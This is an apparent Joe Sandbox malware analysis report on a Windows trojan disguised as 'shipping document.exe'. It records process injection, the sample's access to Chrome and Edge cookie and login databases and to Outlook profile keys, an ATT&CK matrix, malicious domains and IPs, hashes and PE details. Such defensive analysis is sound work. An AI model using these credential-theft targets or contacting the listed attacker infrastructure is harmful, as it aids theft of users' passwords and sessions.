              Source: C:\Users\user\Desktop\shipping document.exeProcess created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"Jump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Users\user\Desktop\shipping document.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\openfiles.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\openfiles.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              Behavior Graph
              ID: 1430793; Sample: shipping document.exe; Startdate: 24/04/2024; Architecture: WINDOWS; Score: 100
              Process chain: shipping document.exe (started) -> shipping document.exe (started) -> oWRaEnEJAq.exe (injected) -> openfiles.exe (started) -> oWRaEnEJAq.exe (injected) and firefox.exe (started)
              Signatures on the sample: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures
              Signatures on the second shipping document.exe process: Maps a DLL or memory area into another process
              Signatures on both oWRaEnEJAq.exe processes: Found direct / indirect Syscall (likely to bypass EDR)
              Signatures on openfiles.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
              DNS/IP (sample): www.tondex.finance; www.tavernadoheroi.store; 19 other IPs or domains
              DNS/IP (second oWRaEnEJAq.exe): www.heldhold.life 203.161.46.103, ports 49750, 49751, 49752, VNPT-AS-VNVNPTCorpVN, Malaysia; tavernadoheroi.store 162.240.81.18, ports 49754, 49755, 49756, UNIFIEDLAYER-AS-1US, United States; 9 other IPs or domains

              Source | Detection | Scanner | Label | Link
              shipping document.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
              shipping document.exe | 35% | Virustotal | | Browse
              shipping document.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              carliente.com | 1% | Virustotal | | Browse
              www.a-two-spa-salon.com | 0% | Virustotal | | Browse
              td-ccm-neg-87-45.wixdns.net | 0% | Virustotal | | Browse
              www.jthzbrdb.fun | 3% | Virustotal | | Browse
              www.tavernadoheroi.store | 0% | Virustotal | | Browse
              www.carliente.com | 1% | Virustotal | | Browse
              www.tondex.finance | 1% | Virustotal | | Browse
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430793
Start date and time: 2024-04-24 07:24:26 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: shipping document.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@16/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 135
• Number of non-executed functions: 316
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target oWRaEnEJAq.exe, PID 2132 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
Time | Type | Description
07:25:16 | API Interceptor | 1x Sleep call for process: shipping document.exe modified
07:26:29 | API Interceptor | 9570908x Sleep call for process: openfiles.exe modified
                                                                                              Process:C:\Users\user\Desktop\shipping document.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1216
                                                                                              Entropy (8bit):5.34331486778365
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                              Process:C:\Windows\SysWOW64\openfiles.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.954404387796586
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                              File name:shipping document.exe
                                                                                              File size:730'112 bytes
                                                                                              MD5:180165361384e56db00389733f0c54f5
                                                                                              SHA1:1d48e601e3ba392fafde82b4a7fc0a39fba0a382
                                                                                              SHA256:48ca70c01e870434304ccd508ef88d824b8d3c9588c990402dae450a5e56f73c
                                                                                              SHA512:e6bcb1cc13e5229889cb9dfdf495bd44278259eb7a9dbaaa1d9d250be61e7b2665e3058592da07111c758b6e8901f7bacb67ee6df8d2048c8b39f5c5a010d3df
                                                                                              SSDEEP:12288:yNgLeFR6IXlv312Z33NUiiVtMrT5Xgb/ToMiliQNDksybWWcirgNw76c/Xz0:mXJ312Z3uiUrTAi+yaWBrvB
                                                                                              TLSH:79F4225133EA4912D27C1B760CB940115BF2F85A6A70C3DC8DE294CB46D3F0A8EB5B6B
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e(f..............0.............&,... ...@....@.. ....................................@................................
                                                                                              Icon Hash:356d6165656175d6
                                                                                              Entrypoint:0x4b2c26
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x6628652E [Wed Apr 24 01:49:34 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              inc esi
                                                                                              dec edi
                                                                                              push edx
                                                                                              xor al, 54h
                                                                                              xor eax, 42384738h
                                                                                              aaa
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [edi], dh
                                                                                              cmp byte ptr [ecx+50h], dl
                                                                                              xor eax, 36374734h
                                                                                              pop edx
                                                                                              inc ebx
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb2bd4 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb4000 | 0x9c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb0c4c | 0xb1000 | b7a352f0fd823bcf49779771e8b35c13 | False | 0.9617513020833334 | data | 7.9656292226257115 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb4000 | 0x9c4 | 0xc00 | e46c16c3576457b7e2a5b79e17ee2862 | False | 0.4479166666666667 | data | 5.076861687014913 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb6000 | 0xc | 0x400 | 687e0b0f6a253d7b27d3db6718cd0f88 | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb40c8 | 0x576 | PNG image data, 158 x 158, 8-bit/color RGBA, non-interlaced | | | 0.6552217453505007
RT_GROUP_ICON | 0xb4650 | 0x14 | data | | | 1.15
RT_VERSION | 0xb4674 | 0x34c | data | | | 0.42298578199052134

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Apr 24, 2024 07:26:27.152801991 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152848005 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.152880907 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152926922 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152955055 CEST8049743157.7.107.63192.168.2.4
                                                                                              Apr 24, 2024 07:26:27.152961969 CEST4974380192.168.2.4157.7.107.63
                                                                                              Apr 24, 2024 07:26:27.153042078 CEST8049743157.7.107.63192.168.2.4
